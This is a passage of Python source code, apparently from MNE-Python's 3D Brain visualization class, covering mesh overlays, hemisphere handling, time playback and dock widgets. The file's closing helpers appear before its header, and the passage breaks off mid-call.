points/samples\n%s\n%s" % (times, time_idx)) # Sometimes the first screenshot is rendered with a different # resolution on OS X self.screenshot(time_viewer=time_viewer) old_mode = self.time_interpolation if interpolation is not None: self.set_time_interpolation(interpolation) try: images = [ self.screenshot(time_viewer=time_viewer) for _ in self._iter_time(time_idx, callback)] finally: self.set_time_interpolation(old_mode) if callback is not None: callback(frame=len(time_idx), n_frames=len(time_idx)) return images def _iter_time(self, time_idx, callback): """Iterate through time points, then reset to current time. Parameters ---------- time_idx : array_like Time point indexes through which to iterate. callback : callable | None Callback to call before yielding each frame. Yields ------ idx : int | float Current index. Notes ----- Used by movie and image sequence saving functions. """ if self.time_viewer: func = partial(self.callbacks["time"], update_widget=True) else: func = self.set_time_point current_time_idx = self._data["time_idx"] for ii, idx in enumerate(time_idx): func(idx) if callback is not None: callback(frame=ii, n_frames=len(time_idx)) yield idx # Restore original time index func(current_time_idx) def _check_stc(self, hemi, array, vertices): from ...source_estimate import ( _BaseSourceEstimate, _BaseSurfaceSourceEstimate, _BaseMixedSourceEstimate, _BaseVolSourceEstimate ) if isinstance(array, _BaseSourceEstimate): stc = array stc_surf = stc_vol = None if isinstance(stc, _BaseSurfaceSourceEstimate): stc_surf = stc elif isinstance(stc, _BaseMixedSourceEstimate): stc_surf = stc.surface() if hemi != 'vol' else None stc_vol = stc.volume() if hemi == 'vol' else None elif isinstance(stc, _BaseVolSourceEstimate): stc_vol = stc if hemi == 'vol' else None else: raise TypeError("stc not supported") if stc_surf is None and stc_vol is None: raise ValueError("No data to be added") if stc_surf is not None: array = getattr(stc_surf, hemi + '_data') vertices = stc_surf.vertices[0 if hemi == 'lh' else 1] if stc_vol is not None: array = stc_vol.data vertices = np.concatenate(stc_vol.vertices) else: stc = None return stc, array, vertices def _check_hemi(self, hemi, extras=()): """Check for safe single-hemi input, returns str.""" _validate_type(hemi, (None, str), 'hemi') if hemi is None: if self._hemi not in ['lh', 'rh']: raise ValueError('hemi must not be None when both ' 'hemispheres are displayed') hemi = self._hemi _check_option('hemi', hemi, ('lh', 'rh') + tuple(extras)) return hemi def _check_hemis(self, hemi): """Check for safe dual or single-hemi input, returns list.""" if hemi is None: if self._hemi not in ['lh', 'rh']: hemi = ['lh', 'rh'] else: hemi = [self._hemi] elif hemi not in ['lh', 'rh']: extra = ' or None' if self._hemi in ['lh', 'rh'] else '' raise ValueError('hemi must be either "lh" or "rh"' + extra) else: hemi = [hemi] return hemi def _to_borders(self, label, hemi, borders, restrict_idx=None): """Convert a label/parc to borders.""" if not isinstance(borders, (bool, int)) or borders < 0: raise ValueError('borders must be a bool or positive integer') if borders: n_vertices = label.size edges = mesh_edges(self.geo[hemi].orig_faces) edges = edges.tocoo() border_edges = label[edges.row] != label[edges.col] show = np.zeros(n_vertices, dtype=np.int64) keep_idx = np.unique(edges.row[border_edges]) if isinstance(borders, int): for _ in range(borders): keep_idx = np.in1d( self.geo[hemi].orig_faces.ravel(), keep_idx) keep_idx.shape = self.geo[hemi].orig_faces.shape keep_idx = self.geo[hemi].orig_faces[ np.any(keep_idx, axis=1)] keep_idx = np.unique(keep_idx) if restrict_idx is not None: keep_idx = keep_idx[np.in1d(keep_idx, restrict_idx)] show[keep_idx] = 1 label *= show @deprecated('enable_depth_peeling is deprecated and will be ' 'removed in 1.1') def enable_depth_peeling(self): """Enable depth peeling. """ self._renderer._enable_depth_peeling() def get_picked_points(self): """Return the vertices of the picked points. Returns ------- points : list of int | None The vertices picked by the time viewer. """ if hasattr(self, "time_viewer"): return self.picked_points def __hash__(self): """Hash the object.""" raise NotImplementedError def _safe_interp1d(x, y, kind='linear', axis=-1, assume_sorted=False): """Work around interp1d not liking singleton dimensions.""" from scipy.interpolate import interp1d if y.shape[axis] == 1: def func(x): return np.take(y, np.zeros(np.asarray(x).shape, int), axis=axis) return func else: return interp1d(x, y, kind, axis=axis, assume_sorted=assume_sorted) def _update_limits(fmin, fmid, fmax, center, array): if center is None: if fmin is None: fmin = array.min() if array.size > 0 else 0 if fmax is None: fmax = array.max() if array.size > 0 else 1 else: if fmin is None: fmin = 0 if fmax is None: fmax = np.abs(center - array).max() if array.size > 0 else 1 if fmid is None: fmid = (fmin + fmax) / 2. if fmin >= fmid: raise RuntimeError('min must be < mid, got %0.4g >= %0.4g' % (fmin, fmid)) if fmid >= fmax: raise RuntimeError('mid must be < max, got %0.4g >= %0.4g' % (fmid, fmax)) return fmin, fmid, fmax def _update_monotonic(lims, fmin, fmid, fmax): if fmin is not None: lims['fmin'] = fmin if lims['fmax'] < fmin: logger.debug(f' Bumping fmax = {lims['fmax']} to {fmin}') lims['fmax'] = fmin if lims['fmid'] < fmin: logger.debug(f' Bumping fmid = {lims['fmid']} to {fmin}') lims['fmid'] = fmin assert lims['fmin'] <= lims['fmid'] <= lims['fmax'] if fmid is not None: lims['fmid'] = fmid if lims['fmin'] > fmid: logger.debug(f' Bumping fmin = {lims['fmin']} to {fmid}') lims['fmin'] = fmid if lims['fmax'] < fmid: logger.debug(f' Bumping fmax = {lims['fmax']} to {fmid}') lims['fmax'] = fmid assert lims['fmin'] <= lims['fmid'] <= lims['fmax'] if fmax is not None: lims['fmax'] = fmax if lims['fmin'] > fmax: logger.debug(f' Bumping fmin = {lims['fmin']} to {fmax}') lims['fmin'] = fmax if lims['fmid'] > fmax: logger.debug(f' Bumping fmid = {lims['fmid']} to {fmax}') lims['fmid'] = fmax assert lims['fmin'] <= lims['fmid'] <= lims['fmax'] def _get_range(brain): val = np.abs(np.concatenate(list(brain._current_act_data.values()))) return [np.min(val), np.max(val)] class _FakeIren(): def EnterEvent(self): pass def MouseMoveEvent(self): pass def LeaveEvent(self): pass def SetEventInformation(self, *args, **kwargs): pass def CharEvent(self): pass def KeyPressEvent(self, *args, **kwargs): pass def KeyReleaseEvent(self, *args, **kwargs): pass
# Authors: Alexandre Gramfort <alexandre.gramfort@inria.fr> # Eric Larson <larson.eric.d@gmail.com> # Oleh Kozynets <ok7mailbox@gmail.com> # Guillaume Favelier <guillaume.favelier@gmail.com> # jona-sassenhagen <jona.sassenhagen@gmail.com> # Joan Massich <mailsik@gmail.com> # # License: Simplified BSD import contextlib from functools import partial from io import BytesIO import os import os.path as op import time import copy import traceback import warnings import numpy as np from collections import OrderedDict from .colormap import calculate_lut from .surface import _Surface from .view import views_dicts, _lh_views_dict from .callback import (ShowView, TimeCallBack, SmartCallBack, UpdateLUT, UpdateColorbarScale) from ..utils import (_show_help_fig, _get_color_list, concatenate_images, _generate_default_filename, _save_ndarray_img, safe_event) from .._3d import (_process_clim, _handle_time, _check_views, _handle_sensor_types, _plot_sensors, _plot_forward) from ...defaults import _handle_default, DEFAULTS from ...fixes import _point_data, _cell_data from ..._freesurfer import (vertex_to_mni, read_talxfm, read_freesurfer_lut, _get_head_surface, _get_skull_surface) from ...io.pick import pick_types from ...io.meas_info import Info from ...surface import (mesh_edges, _mesh_borders, _marching_cubes, get_meg_helmet_surf) from ...source_space import SourceSpaces from ...transforms import (Transform, apply_trans, invert_transform, _get_trans, _get_transforms_to_coord_frame, _frame_to_str) from ...utils import (_check_option, logger, verbose, fill_doc, _validate_type, use_log_level, Bunch, _ReuseCycle, warn, deprecated, get_subjects_dir, _check_fname, _to_rgb) _ARROW_MOVE = 10 # degrees per press class _Overlay(object): def __init__(self, scalars, colormap, rng, opacity, name): self._scalars = scalars self._colormap = colormap assert rng is not None self._rng = rng self._opacity = opacity self._name = name def to_colors(self): from .._3d import _get_cmap from matplotlib.colors import Colormap, ListedColormap if isinstance(self._colormap, str): cmap = _get_cmap(self._colormap) elif isinstance(self._colormap, Colormap): cmap = self._colormap else: cmap = ListedColormap( self._colormap / 255., name=str(type(self._colormap))) logger.debug( f'Color mapping {repr(self._name)} with {cmap.name} ' f'colormap and range {self._rng}') rng = self._rng assert rng is not None scalars = _norm(self._scalars, rng) colors = cmap(scalars) if self._opacity is not None: colors[:, 3] *= self._opacity return colors def _norm(x, rng): if rng[0] == rng[1]: factor = 1 if rng[0] == 0 else 1e-6 * rng[0] else: factor = rng[1] - rng[0] return (x - rng[0]) / factor class _LayeredMesh(object): def __init__(self, renderer, vertices, triangles, normals): self._renderer = renderer self._vertices = vertices self._triangles = triangles self._normals = normals self._polydata = None self._actor = None self._is_mapped = False self._current_colors = None self._cached_colors = None self._overlays = OrderedDict() self._default_scalars = np.ones(vertices.shape) self._default_scalars_name = 'Data' def map(self): kwargs = { "color": None, "pickable": True, "rgba": True, } mesh_data = self._renderer.mesh( x=self._vertices[:, 0], y=self._vertices[:, 1], z=self._vertices[:, 2], triangles=self._triangles, normals=self._normals, scalars=self._default_scalars, **kwargs ) self._actor, self._polydata = mesh_data self._is_mapped = True def _compute_over(self, B, A): assert A.ndim == B.ndim == 2 assert A.shape[1] == B.shape[1] == 4 A_w = A[:, 3:] # * 1 B_w = B[:, 3:] * (1 - A_w) C = A.copy() C[:, :3] *= A_w C[:, :3] += B[:, :3] * B_w C[:, 3:] += B_w C[:, :3] /= C[:, 3:] return np.clip(C, 0, 1, out=C) def _compose_overlays(self): B = cache = None for overlay in self._overlays.values(): A = overlay.to_colors() if B is None: B = A else: cache = B B = self._compute_over(cache, A) return B, cache def add_overlay(self, scalars, colormap, rng, opacity, name): overlay = _Overlay( scalars=scalars, colormap=colormap, rng=rng, opacity=opacity, name=name, ) self._overlays[name] = overlay colors = overlay.to_colors() if self._current_colors is None: self._current_colors = colors else: # save previous colors to cache self._cached_colors = self._current_colors self._current_colors = self._compute_over( self._cached_colors, colors) # apply the texture self._apply() def remove_overlay(self, names): to_update = False if not isinstance(names, list): names = [names] for name in names: if name in self._overlays: del self._overlays[name] to_update = True if to_update: self.update() def _apply(self): if self._current_colors is None or self._renderer is None: return self._renderer._set_mesh_scalars( mesh=self._polydata, scalars=self._current_colors, name=self._default_scalars_name, ) def update(self, colors=None): if colors is not None and self._cached_colors is not None: self._current_colors = self._compute_over( self._cached_colors, colors) else: self._current_colors, self._cached_colors = \ self._compose_overlays() self._apply() def _clean(self): mapper = self._actor.GetMapper() mapper.SetLookupTable(None) self._actor.SetMapper(None) self._actor = None self._polydata = None self._renderer = None def update_overlay(self, name, scalars=None, colormap=None, opacity=None, rng=None): overlay = self._overlays.get(name, None) if overlay is None: return if scalars is not None: overlay._scalars = scalars if colormap is not None: overlay._colormap = colormap if opacity is not None: overlay._opacity = opacity if rng is not None: overlay._rng = rng # partial update: use cache if possible if name == list(self._overlays.keys())[-1]: self.update(colors=overlay.to_colors()) else: # full update self.update() @fill_doc class Brain(object): """Class for visualizing a brain. .. warning:: The API for this class is not currently complete. We suggest using :meth:`mne.viz.plot_source_estimates` with the PyVista backend enabled to obtain a ``Brain`` instance. Parameters ---------- subject_id : str Subject name in Freesurfer subjects dir. hemi : str Hemisphere id (ie 'lh', 'rh', 'both', or 'split'). In the case of 'both', both hemispheres are shown in the same window. In the case of 'split' hemispheres are displayed side-by-side in different viewing panes. surf : str FreeSurfer surface mesh name (ie 'white', 'inflated', etc.). title : str Title for the window. cortex : str, list, dict Specifies how the cortical surface is rendered. Options: 1. The name of one of the preset cortex styles: ``'classic'`` (default), ``'high_contrast'``, ``'low_contrast'``, or ``'bone'``. 2. A single color-like argument to render the cortex as a single color, e.g. ``'red'`` or ``(0.1, 0.4, 1.)``. 3. A list of two color-like used to render binarized curvature values for gyral (first) and sulcal (second). regions, e.g., ``['red', 'blue']`` or ``[(1, 0, 0), (0, 0, 1)]``. 4. A dict containing keys ``'vmin', 'vmax', 'colormap'`` with values used to render the binarized curvature (where 0 is gyral, 1 is sulcal). .. versionchanged:: 0.24 Add support for non-string arguments. alpha : float in [0, 1] Alpha level to control opacity of the cortical surface. size : int | array-like, shape (2,) The size of the window, in pixels. can be one number to specify a square window, or a length-2 sequence to specify (width, height). background : tuple(int, int, int) The color definition of the background: (red, green, blue). foreground : matplotlib color Color of the foreground (will be used for colorbars and text). None (default) will use black or white depending on the value of ``background``. figure : list of Figure | None If None (default), a new window will be created with the appropriate views. subjects_dir : str | None If not None, this directory will be used as the subjects directory instead of the value set using the SUBJECTS_DIR environment variable. %(views)s offset : bool | str If True, shifts the right- or left-most x coordinate of the left and right surfaces, respectively, to be at zero. This is useful for viewing inflated surface where hemispheres typically overlap. Can be "auto" (default) use True with inflated surfaces and False otherwise (Default: 'auto'). Only used when ``hemi='both'``. .. versionchanged:: 0.23 Default changed to "auto". show_toolbar : bool If True, toolbars will be shown for each view. offscreen : bool If True, rendering will be done offscreen (not shown). Useful mostly for generating images or screenshots, but can be buggy. Use at your own risk. interaction : str Can be "trackball" (default) or "terrain", i.e. a turntable-style camera. units : str Can be 'm' or 'mm' (default). %(view_layout)s silhouette : dict | bool As a dict, it contains the ``color``, ``linewidth``, ``alpha`` opacity and ``decimate`` (level of decimation between 0 and 1 or None) of the brain's silhouette to display. If True, the default values are used and if False, no silhouette will be displayed. Defaults to False. theme : str | path-like Can be "auto" (default), "light", or "dark" or a path-like to a custom stylesheet. For Dark-Mode and automatic Dark-Mode-Detection, :mod:`qdarkstyle` respectively and `darkdetect <https://github.com/albertosottile/darkdetect>`__ is required. show : bool Display the window as soon as it is ready. Defaults to True. block : bool If True, start the Qt application event loop. Default to False. Attributes ---------- geo : dict A dictionary of PyVista surface objects for each hemisphere. overlays : dict The overlays. Notes ----- This table shows the capabilities of each Brain backend ("✓" for full support, and "-" for partial support): .. table:: :widths: auto +-------------------------------------+--------------+---------------+ | 3D function: | surfer.Brain | mne.viz.Brain | +=====================================+==============+===============+ | :meth:`add_annotation` | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`add_data` | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`add_dipole` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`add_foci` | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`add_forward` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`add_head` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`add_label` | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`add_sensors` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`add_skull` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`add_text` | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`add_volume_labels` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`close` | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | data | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | foci | ✓ | | +-------------------------------------+--------------+---------------+ | labels | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`remove_data` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`remove_dipole` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`remove_forward` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`remove_head` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`remove_labels` | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`remove_annotations` | - | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`remove_sensors` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`remove_skull` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`remove_text` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`remove_volume_labels` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`save_image` | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`save_movie` | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`screenshot` | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`show_view` | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | TimeViewer | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`get_picked_points` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`add_data(volume) <add_data>` | | ✓ | +-------------------------------------+--------------+---------------+ | view_layout | | ✓ | +-------------------------------------+--------------+---------------+ | flatmaps | | ✓ | +-------------------------------------+--------------+---------------+ | vertex picking | | ✓ | +-------------------------------------+--------------+---------------+ | label picking | | ✓ | +-------------------------------------+--------------+---------------+ """ def __init__(self, subject_id, hemi='both', surf='pial', title=None, cortex="classic", alpha=1.0, size=800, background="black", foreground=None, figure=None, subjects_dir=None, views='auto', offset='auto', show_toolbar=False, offscreen=False, interaction='trackball', units='mm', view_layout='vertical', silhouette=False, theme='auto', show=True, block=False): from ..backends.renderer import backend, _get_renderer if hemi is None: hemi = 'vol' hemi = self._check_hemi(hemi, extras=('both', 'split', 'vol')) if hemi in ('both', 'split'): self._hemis = ('lh', 'rh') else: assert hemi in ('lh', 'rh', 'vol') self._hemis = (hemi, ) self._view_layout = _check_option('view_layout', view_layout, ('vertical', 'horizontal')) if figure is not None and not isinstance(figure, int): backend._check_3d_figure(figure) if title is None: self._title = subject_id else: self._title = title self._interaction = 'trackball' self._bg_color = _to_rgb(background, name='background') if foreground is None: foreground = 'w' if sum(self._bg_color) < 2 else 'k' self._fg_color = _to_rgb(foreground, name='foreground') del background, foreground views = _check_views(surf, views, hemi) col_dict = dict(lh=1, rh=1, both=1, split=2, vol=1) shape = (len(views), col_dict[hemi]) if self._view_layout == 'horizontal': shape = shape[::-1] self._subplot_shape = shape size = tuple(np.atleast_1d(size).round(0).astype(int).flat) if len(size) not in (1, 2): raise ValueError('"size" parameter must be an int or length-2 ' 'sequence of ints.') size = size if len(size) == 2 else size * 2 # 1-tuple to 2-tuple subjects_dir = get_subjects_dir(subjects_dir) self.theme = theme self.time_viewer = False self._block = block self._hemi = hemi self._units = units self._alpha = float(alpha) self._subject_id = subject_id self._subjects_dir = subjects_dir self._views = views self._times = None self._vertex_to_label_id = dict() self._annotation_labels = dict() self._labels = {'lh': list(), 'rh': list()} self._unnamed_label_id = 0 # can only grow self._annots = {'lh': list(), 'rh': list()} self._layered_meshes = dict() self._actors = dict() self._elevation_rng = [15, 165] # range of motion of camera on theta self._lut_locked = None self._cleaned = False # default values for silhouette self._silhouette = { 'color': self._bg_color, 'line_width': 2, 'alpha': alpha, 'decimate': 0.9, } _validate_type(silhouette, (dict, bool), 'silhouette') if isinstance(silhouette, dict): self._silhouette.update(silhouette) self.silhouette = True else: self.silhouette = silhouette self._scalar_bar = None # for now only one time label can be added # since it is the same for all figures self._time_label_added = False # array of data used by TimeViewer self._data = {} self.geo = {} self.set_time_interpolation('nearest') geo_kwargs = self._cortex_colormap(cortex) # evaluate at the midpoint of the used colormap val = -geo_kwargs['vmin'] / (geo_kwargs['vmax'] - geo_kwargs['vmin']) self._brain_color = geo_kwargs['colormap'](val) # load geometry for one or both hemispheres as necessary _validate_type(offset, (str, bool), 'offset') if isinstance(offset, str): _check_option('offset', offset, ('auto',), extra='when str') offset = (surf in ('inflated', 'flat')) offset = None if (not offset or hemi != 'both') else 0.0 logger.debug(f'Hemi offset: {offset}') self._renderer = _get_renderer(name=self._title, size=size, bgcolor=self._bg_color, shape=shape, fig=figure) self._renderer._window_close_connect(self._clean) self._renderer._window_set_theme(theme) self.plotter = self._renderer.plotter self._setup_canonical_rotation() # plot hemis for h in ('lh', 'rh'): if h not in self._hemis: continue # don't make surface if not chosen # Initialize a Surface object as the geometry geo = _Surface(self._subject_id, h, surf, self._subjects_dir, offset, units=self._units, x_dir=self._rigid[0, :3]) # Load in the geometry and curvature geo.load_geometry() geo.load_curvature() self.geo[h] = geo for _, _, v in self._iter_views(h): if self._layered_meshes.get(h) is None: mesh = _LayeredMesh( renderer=self._renderer, vertices=self.geo[h].coords, triangles=self.geo[h].faces, normals=self.geo[h].nn, ) mesh.map() # send to GPU mesh.add_overlay( scalars=self.geo[h].bin_curv, colormap=geo_kwargs["colormap"], rng=[geo_kwargs["vmin"], geo_kwargs["vmax"]], opacity=alpha, name='curv', ) self._layered_meshes[h] = mesh # add metadata to the mesh for picking mesh._polydata._hemi = h else: actor = self._layered_meshes[h]._actor self._renderer.plotter.add_actor(actor, render=False) if self.silhouette: mesh = self._layered_meshes[h] self._renderer._silhouette( mesh=mesh._polydata, color=self._silhouette["color"], line_width=self._silhouette["line_width"], alpha=self._silhouette["alpha"], decimate=self._silhouette["decimate"], ) self._renderer.set_camera(update=False, reset_camera=False, **views_dicts[h][v]) self.interaction = interaction self._closed = False if show: self.show() # update the views once the geometry is all set for h in self._hemis: for ri, ci, v in self._iter_views(h): self.show_view(v, row=ri, col=ci, hemi=h) if surf == 'flat': self._renderer.set_interaction("rubber_band_2d") def _setup_canonical_rotation(self): from ...coreg import fit_matched_points, _trans_from_params self._rigid = np.eye(4) try: xfm = read_talxfm(self._subject_id, self._subjects_dir) except Exception: return # XYZ+origin + halfway pts_tal = np.concatenate([np.eye(4)[:, :3], np.eye(3) * 0.5]) pts_subj = apply_trans(invert_transform(xfm), pts_tal) # we fit with scaling enabled, but then discard it (we just need # the rigid-body components) params = fit_matched_points(pts_subj, pts_tal, scale=3, out='params') self._rigid[:] = _trans_from_params((True, True, False), params[:6]) def setup_time_viewer(self, time_viewer=True, show_traces=True): """Configure the time viewer parameters. Parameters ---------- time_viewer : bool If True, enable widgets interaction. Defaults to True. show_traces : bool If True, enable visualization of time traces. Defaults to True. Notes ----- The keyboard shortcuts are the following: '?': Display help window 'i': Toggle interface 's': Apply auto-scaling 'r': Restore original clim 'c': Clear all traces 'n': Shift the time forward by the playback speed 'b': Shift the time backward by the playback speed 'Space': Start/Pause playback 'Up': Decrease camera elevation angle 'Down': Increase camera elevation angle 'Left': Decrease camera azimuth angle 'Right': Increase camera azimuth angle """ from ..backends._utils import _qt_app_exec if self.time_viewer: return if not self._data: raise ValueError("No data to visualize. See ``add_data``.") self.time_viewer = time_viewer self.orientation = list(_lh_views_dict.keys()) self.default_smoothing_range = [-1, 15] # Default configuration self.playback = False self.visibility = False self.refresh_rate_ms = max(int(round(1000. / 60.)), 1) self.default_scaling_range = [0.2, 2.0] self.default_playback_speed_range = [0.01, 1] self.default_playback_speed_value = 0.01 self.default_status_bar_msg = "Press ? for help" self.default_label_extract_modes = { "stc": ["mean", "max"], "src": ["mean_flip", "pca_flip", "auto"], } self.default_trace_modes = ('vertex', 'label') self.annot = None self.label_extract_mode = None all_keys = ('lh', 'rh', 'vol') self.act_data_smooth = {key: (None, None) for key in all_keys} self.color_list = _get_color_list() # remove grey for better contrast on the brain self.color_list.remove("#7f7f7f") self.color_cycle = _ReuseCycle(self.color_list) self.mpl_canvas = None self.help_canvas = None self.rms = None self.picked_patches = {key: list() for key in all_keys} self.picked_points = {key: list() for key in all_keys} self.pick_table = dict() self._spheres = list() self._mouse_no_mvt = -1 self.callbacks = dict() self.widgets = dict() self.keys = ('fmin', 'fmid', 'fmax') # Derived parameters: self.playback_speed = self.default_playback_speed_value _validate_type(show_traces, (bool, str, 'numeric'), 'show_traces') self.interactor_fraction = 0.25 if isinstance(show_traces, str): self.show_traces = True self.separate_canvas = False self.traces_mode = 'vertex' if show_traces == 'separate': self.separate_canvas = True elif show_traces == 'label': self.traces_mode = 'label' else: assert show_traces == 'vertex' # guaranteed above else: if isinstance(show_traces, bool): self.show_traces = show_traces else: show_traces = float(show_traces) if not 0 < show_traces < 1: raise ValueError( 'show traces, if numeric, must be between 0 and 1, ' f'got {show_traces}') self.show_traces = True self.interactor_fraction = show_traces self.traces_mode = 'vertex' self.separate_canvas = False del show_traces self._configure_time_label() self._configure_scalar_bar() self._configure_shortcuts() self._configure_picking() self._configure_tool_bar() self._configure_dock() self._configure_menu() self._configure_status_bar() self._configure_playback() self._configure_help() # show everything at the end self.toggle_interface() self._renderer.show() # sizes could change, update views for hemi in ('lh', 'rh'): for ri, ci, v in self._iter_views(hemi): self.show_view(view=v, row=ri, col=ci) self._renderer._process_events() self._renderer._update() # finally, show the MplCanvas if self.show_traces: self.mpl_canvas.show() if self._block: _qt_app_exec(self._renderer.figure.store["app"]) @safe_event def _clean(self): # resolve the reference cycle self.clear_glyphs() self.remove_annotations() # clear init actors for hemi in self._hemis: self._layered_meshes[hemi]._clean() self._clear_callbacks() self._clear_widgets() if getattr(self, 'mpl_canvas', None) is not None: self.mpl_canvas.clear() if getattr(self, 'act_data_smooth', None) is not None: for key in list(self.act_data_smooth.keys()): self.act_data_smooth[key] = None # XXX this should be done in PyVista for renderer in self._renderer._all_renderers: renderer.RemoveAllLights() # app_window cannot be set to None because it is used in __del__ for key in ('lighting', 'interactor', '_RenderWindow'): setattr(self.plotter, key, None) # Qt LeaveEvent requires _Iren so we use _FakeIren instead of None # to resolve the ref to vtkGenericRenderWindowInteractor self.plotter._Iren = _FakeIren() if getattr(self.plotter, 'picker', None) is not None: self.plotter.picker = None # XXX end PyVista for key in ('plotter', 'window', 'dock', 'tool_bar', 'menu_bar', 'interactor', 'mpl_canvas', 'time_actor', 'picked_renderer', 'act_data_smooth', '_scalar_bar', 'actions', 'widgets', 'geo', '_data'): setattr(self, key, None) self._cleaned = True def toggle_interface(self, value=None): """Toggle the interface. Parameters ---------- value : bool | None If True, the widgets are shown and if False, they are hidden. If None, the state of the widgets is toggled. Defaults to None. """ if value is None: self.visibility = not self.visibility else: self.visibility = value # update tool bar and dock with self._renderer._window_ensure_minimum_sizes(): if self.visibility: self._renderer._dock_show() self._renderer._tool_bar_update_button_icon( name="visibility", icon_name="visibility_on") else: self._renderer._dock_hide() self._renderer._tool_bar_update_button_icon( name="visibility", icon_name="visibility_off") self._renderer._update() def apply_auto_scaling(self): """Detect automatically fitting scaling parameters.""" self._update_auto_scaling() def restore_user_scaling(self): """Restore original scaling parameters.""" self._update_auto_scaling(restore=True) def toggle_playback(self, value=None): """Toggle time playback. Parameters ---------- value : bool | None If True, automatic time playback is enabled and if False, it's disabled. If None, the state of time playback is toggled. Defaults to None. """ if value is None: self.playback = not self.playback else: self.playback = value # update tool bar icon if self.playback: self._renderer._tool_bar_update_button_icon( name="play", icon_name="pause") else: self._renderer._tool_bar_update_button_icon( name="play", icon_name="play") if self.playback: time_data = self._data['time'] max_time = np.max(time_data) if self._current_time == max_time: # start over self.set_time_point(0) # first index self._last_tick = time.time() def reset(self): """Reset view and time step.""" self.reset_view() max_time = len(self._data['time']) - 1 if max_time > 0: self.callbacks["time"]( self._data["initial_time_idx"], update_widget=True, ) self._renderer._update() def set_playback_speed(self, speed): """Set the time playback speed. Parameters ---------- speed : float The speed of the playback. """ self.playback_speed = speed @safe_event def _play(self): if self.playback: try: self._advance() except Exception: self.toggle_playback(value=False) raise def _advance(self): this_time = time.time() delta = this_time - self._last_tick self._last_tick = time.time() time_data = self._data['time'] times = np.arange(self._n_times) time_shift = delta * self.playback_speed max_time = np.max(time_data) time_point = min(self._current_time + time_shift, max_time) # always use linear here -- this does not determine the data # interpolation mode, it just finds where we are (in time) in # terms of the time indices idx = np.interp(time_point, time_data, times) self.callbacks["time"](idx, update_widget=True) if time_point == max_time: self.toggle_playback(value=False) def _configure_time_label(self): self.time_actor = self._data.get('time_actor') if self.time_actor is not None: self.time_actor.SetPosition(0.5, 0.03) self.time_actor.GetTextProperty().SetJustificationToCentered() self.time_actor.GetTextProperty().BoldOn() def _configure_scalar_bar(self): if self._scalar_bar is not None: self._scalar_bar.SetOrientationToVertical() self._scalar_bar.SetHeight(0.6) self._scalar_bar.SetWidth(0.05) self._scalar_bar.SetPosition(0.02, 0.2) def _configure_dock_time_widget(self, layout=None): len_time = len(self._data['time']) - 1 if len_time < 1: return layout = self._renderer.dock_layout if layout is None else layout hlayout = self._renderer._dock_add_layout(vertical=False) self.widgets["min_time"] = self._renderer._dock_add_label( value="-", layout=hlayout) self._renderer._dock_add_stretch(hlayout) self.widgets["current_time"] = self._renderer._dock_add_label( value="x", layout=hlayout) self._renderer._dock_add_stretch(hlayout) self.widgets["max_time"] = self._renderer._dock_add_label( value="+", layout=hlayout) self._renderer._layout_add_widget(layout, hlayout) min_time = float(self._data['time'][0]) max_time = float(self._data['time'][-1]) self.widgets["min_time"].set_value(f"{min_time: .3f}") self.widgets["max_time"].set_value(f"{max_time: .3f}") self.widgets["current_time"].set_value(f"{self._current_time: .3f}") def _configure_dock_playback_widget(self, name): layout = self._renderer._dock_add_group_box(name) len_time = len(self._data['time']) - 1 # Time widget if len_time < 1: self.callbacks["time"] = None self.widgets["time"] = None else: self.callbacks["time"] = TimeCallBack( brain=self, callback=self.plot_time_line, ) self.widgets["time"] = self._renderer._dock_add_slider( name="Time (s)", value=self._data['time_idx'], rng=[0, len_time], double=True, callback=self.callbacks["time"], compact=False, layout=layout, ) self.callbacks["time"].widget = self.widgets["time"] # Time labels if len_time < 1: self.widgets["min_time"] = None self.widgets["max_time"] = None self.widgets["current_time"] = None else: self._configure_dock_time_widget(layout) self.callbacks["time"].label = self.widgets["current_time"] # Playback speed widget if len_time < 1: self.callbacks["playback_speed"] = None self.widgets["playback_speed"] = None else: self.callbacks["playback_speed"] = SmartCallBack( callback=self.set_playback_speed, ) self.widgets["playback_speed"] = self._renderer._dock_add_spin_box( name="Speed", value=self.default_playback_speed_value, rng=self.default_playback_speed_range, callback=self.callbacks["playback_speed"], layout=layout, ) self.callbacks["playback_speed"].widget = \ self.widgets["playback_speed"] # Time label current_time = self._current_time assert current_time is not None # should never be the case, float time_label = self._data['time_label'] if callable(time_label): current_time = time_label(current_time) else: current_time = time_label if self.time_actor is not None: self.time_actor.SetInput(current_time) del current_time def _configure_dock_orientation_widget(self, name): layout = self._renderer._dock_add_group_box(name) # Renderer widget rends = [str(i) for i in range(len(self._renderer._all_renderers))] if len(rends) > 1: def select_renderer(idx): idx = int(idx) loc = self._renderer._index_to_loc(idx) self.plotter.subplot(*loc) self.callbacks["renderer"] = SmartCallBack( callback=select_renderer, ) self.widgets["renderer"] = self._renderer._dock_add_combo_box( name="Renderer", value="0", rng=rends, 